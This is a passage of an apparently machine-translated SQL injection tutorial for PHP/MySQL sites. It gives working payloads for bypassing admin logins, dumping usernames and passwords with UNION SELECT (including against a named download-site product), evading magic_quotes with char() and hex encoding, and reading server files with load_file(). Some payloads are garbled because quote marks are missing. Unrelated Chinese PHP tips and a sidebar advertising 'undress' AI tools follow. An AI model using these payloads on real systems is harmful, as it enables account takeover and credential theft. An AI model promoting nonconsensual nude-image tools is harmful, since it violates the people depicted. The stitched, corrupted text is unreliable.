Let’s build the injection statement
Enter
in the input box
a% and 1=2 union select 1,username,3,4,5,6,7,8, password,10,11 from
alphaauthor# is placed in the sql statement and becomes
select * from alphadb where title like %a% and 1=2 union select
1,username,3,4,5,6,7,8, password,10,11 from alphaauthor# %
How about it, come out, haha, everything is under control.
C: Let’s take a look at various injection attack methods from the injection location
1) First let’s take a look at the background login
CodeFirst
//login.php
.......
$query="select * from alphaauthor where UserName= "
.$HTTP_POST_VARS["UserName"]." and
Password= ". $HTTP_POST_VARS["Password"]." ";
$result=mysql_query($query);
$data=mysql_fetch_array($result);
if ($data)
{
echo "Backend login successful";
}
esle
{
echo "Re-login";
exit;
}
..........
?>
Username and password are directly put into SQL for execution without any processing.
See how we can get around it?
The most classic one is still the one:
Enter
in both the username and password boxes
‘or =
Bring it into the sql statement and become
select * from alphaauthor where UserName= or = and Password= or =
The $data obtained in this way must be true, which means we have successfully logged in.
There are also other bypassing methods . The principle is the same, just find a way to make $data return true.
We can use the following methods
1.
Enter both username and password or a = a
Sql became
select * from alphaauthor where UserName= or a = a and Password=
or a = a
2.
Enter both username and password or 1=1 and ‘ =
Sql became
select * from alphaauthor where UserName= or 1=1 and ‘ =
and Password= or 1=1 and ‘ =
Enter both username and password or 2>1 and ‘ =
Sql became
select * from alphaauthor where UserName= or 2>1 and ‘ =
and Password= or 2>1 and ‘ =
3.
Enter the username or 1=1 # Enter the password as you like
Sql became
select * from alphaauthor where UserName= or 1=1 # and
Password= anything
The latter part has been commented out, but of course the return is still true.
4.
Assuming admin's id=1, you can also
Enter username or id=1 # Enter password as you like
Sql became
select * from alphaauthor where UserName= or id=1 # and Password= anything
How about it? Log in directly!
As the saying goes, nothing is impossible unless you can imagine it.
There are more construction methods waiting for you to think about after class.
2) The second commonly used injection place should be the place where the front-end data is displayed.
It has been mentioned many times above, and it involves numeric types, character types, etc., so I won’t repeat it here.
Just to review with an example
Bihai Chaosheng Download Site - v2.0.3 lite has an injection vulnerability, the code is no longer listed
See the results directly
http://localhost/down/index.php?url=&dlid=1%20and%201=2%20union%20select%
201,2,password,4,username,6,7,8,9,10,11,12,13,14,15,16,17,18%20from%
20dl_users
Look, we got what we wanted again
Username alpha
A long list of passwords.
Why do we put the password in the 3 field and the username in the 5 field? We have already mentioned it above. We guess that the 3 and 5 paragraphs should be displayed in string type, which is different from the username we want to display. The field type should be the same as password, so we put it like this.
Why use 18 fields? I don’t know if you still remember that in the introduction of union select, we mentioned that union must require the same number of fields in the before and after selects. We can guess that 18 fields are needed by increasing the number of selects. Only in this way will the content of union select be displayed normally. oh!
3) For other information modifications, the place where users register must have user-level applications.
We have already mentioned update and insert when describing them above. Since they are not very commonly used, we will not elaborate on them here. In the following, we will mention some advanced utilization techniques of update and insert.
2: Now we are about to enter the injection attack teaching session when magic_quotes_gpc=On
When magic_quotes_gpc=On, all the (single quotes) in the variables to be crossed,
" (double quote), (backslash) and null characters are automatically converted to escape characters containing backslashes.
This makes the character injection method come to nothing. At this time, we can only inject numeric types without
Intval() handles the situation. We have already talked about numeric types a lot, right? Since numeric types do not use single quotes, there is no problem of bypassing them. In this case, we can just inject them directly.
1) If it is a character type, it must be like the following, without quotation marks around the characters.
Here we need to use some string processing functions first,
There are many string processing functions. Here we mainly talk about the following ones. For details, please refer to mysqlChinese Reference Manual 7.4.10.
char() interprets the arguments as integers and returns a string consisting of the ASCII code characters of these integers.
Of course, you can also use the hexadecimal number of the character to replace the character. This is also possible. The method is to add 0x in front of the hexadecimal number. You will understand by looking at the example below.
//login.php
…
$query="select * from ".$art_system_db_table[ user ]."
where UserName=$username and Password= ".$Pw." ";
......
?>
Suppose we know that the username in the background is alpha
After conversion to ASCII, it is char(97,108,112,104,97)
Converted to hexadecimal is 0x616C706861
Okay, just type it in the browser:
http://localhost/site/admin/login.php?username=char(97,108,112,104,97)%23
The sql statement becomes:
select * from alphaAut
hor where UserName=char(97,108,112,104,97)# and Password=
As we expected, he executed smoothly and we got what we wanted.
Of course, we can also construct it like this
http://localhost/site/admin/login.php?username=0x616C706861%23
The sql statement becomes:
select * from alphaAuthor where UserName=0x616C706861%23# and Password=
Once again we are winners. It feels like a great achievement,
Maybe you will ask us if we can also put # in char()
In fact char(97,108,112,104,97) is equivalent to alpha
Note that alpha is enclosed in quotes, indicating the alpha string.
We know that in mysql if we execute
mysql> select * from dl_users where username=alpha;
ERROR 1054 (42S22): Unknown column alpha in where clause
See the error returned. Because he will think that alpha is a variable. So we have to put quotes around alpha.
As follows
mysql> select * from dl_users where username= alpha;
This is correct.
If you put the # sign there, it becomes alpha#
Bring it into the sql statement
select * from dl_users where username= alpha# ;
Of course there is nothing, because there is not even the user alpha#.
Okay, let’s look at another example,
//display.php
…
$query="select * from ".$art_system_db_table[ article ]."
where type=$type;
......
?>
The code displays content according to type. $type does not have any filtering and is not put in quotes in the program.
Assume that type contains the xiaohua class, xiaohua’s char() is converted to
char(120,105,97,111,104,117,97)
We build
http://localhost/display.php?type=char(120,105,97,111,104,117,97) and 1=2 union select 1,2,username,4,password,6,7,8,9,10,11 from alphaauthor
Bring it into the sql statement:
select * from ".$art_system_db_table[ article ]."
where type=char(120,105,97,111,104,117,97) and 1=2 union select 1,2,username,4,password,6,7,8,9,10,11 from alphaauthor
Look, our username and password are still there! There is no screenshot, just imagine it: P
2) Someone may ask, can the powerful load_file() still be used when magic_quotes_gpc=On?
This is exactly the problem we are going to solve below. The usage format of load_file() is load_file(‘file path)
We found that we only need to convert the 'file path' into char(). Give it a try
load_file(‘c:/boot.ini) is converted into
load_file(char(99,58,47,98,111,111,116,46,105,110,105))
Figure 22
Just put it in the specific injection
http://localhost/down/index.php?url=&dlid=1%20and%201=2%20union%20select%
201,2,load_file(char
(99,58,47,98,111,111,116,46,105,110,105)),4,5,6,7,8,9,10,11,12,13,14,15,16,
17,18
Look, we have seen the contents of boot.ini.
It's a pity that into outfile cannot be bypassed, otherwise it would be even more fun. But there is still a place where you can use select * from table into outfile, that is.... (Let me give you a hint first, I will tell you below)

php把负数转为正整数的方法:1、使用abs()函数将负数转为正数,使用intval()函数对正数取整,转为正整数,语法“intval(abs($number))”;2、利用“~”位运算符将负数取反加一,语法“~$number + 1”。

实现方法:1、使用“sleep(延迟秒数)”语句,可延迟执行函数若干秒;2、使用“time_nanosleep(延迟秒数,延迟纳秒数)”语句,可延迟执行函数若干秒和纳秒;3、使用“time_sleep_until(time()+7)”语句。

php除以100保留两位小数的方法:1、利用“/”运算符进行除法运算,语法“数值 / 100”;2、使用“number_format(除法结果, 2)”或“sprintf("%.2f",除法结果)”语句进行四舍五入的处理值,并保留两位小数。

判断方法:1、使用“strtotime("年-月-日")”语句将给定的年月日转换为时间戳格式;2、用“date("z",时间戳)+1”语句计算指定时间戳是一年的第几天。date()返回的天数是从0开始计算的,因此真实天数需要在此基础上加1。

php判断有没有小数点的方法:1、使用“strpos(数字字符串,'.')”语法,如果返回小数点在字符串中第一次出现的位置,则有小数点;2、使用“strrpos(数字字符串,'.')”语句,如果返回小数点在字符串中最后一次出现的位置,则有。

php字符串有下标。在PHP中,下标不仅可以应用于数组和对象,还可应用于字符串,利用字符串的下标和中括号“[]”可以访问指定索引位置的字符,并对该字符进行读写,语法“字符串名[下标值]”;字符串的下标值(索引值)只能是整数类型,起始值为0。

方法:1、用“str_replace(" ","其他字符",$str)”语句,可将nbsp符替换为其他字符;2、用“preg_replace("/(\s|\ \;||\xc2\xa0)/","其他字符",$str)”语句。

在php中,可以使用substr()函数来读取字符串后几个字符,只需要将该函数的第二个参数设置为负值,第三个参数省略即可;语法为“substr(字符串,-n)”,表示读取从字符串结尾处向前数第n个字符开始,直到字符串结尾的全部字符。


Hot AI Tools

Undresser.AI Undress
AI-powered app for creating realistic nude photos

AI Clothes Remover
Online AI tool for removing clothes from photos.

Undress AI Tool
Undress images for free

Clothoff.io
AI clothes remover

AI Hentai Generator
Generate AI Hentai for free.

Hot Article

Hot Tools

mPDF
mPDF is a PHP library that can generate PDF files from UTF-8 encoded HTML. The original author, Ian Back, wrote mPDF to output PDF files "on the fly" from his website and handle different languages. It is slower than original scripts like HTML2FPDF and produces larger files when using Unicode fonts, but supports CSS styles etc. and has a lot of enhancements. Supports almost all languages, including RTL (Arabic and Hebrew) and CJK (Chinese, Japanese and Korean). Supports nested block-level elements (such as P, DIV),

SublimeText3 Linux new version
SublimeText3 Linux latest version

Notepad++7.3.1
Easy-to-use and free code editor

PhpStorm Mac version
The latest (2018.2.1) professional PHP integrated development tool

Dreamweaver CS6
Visual web development tools
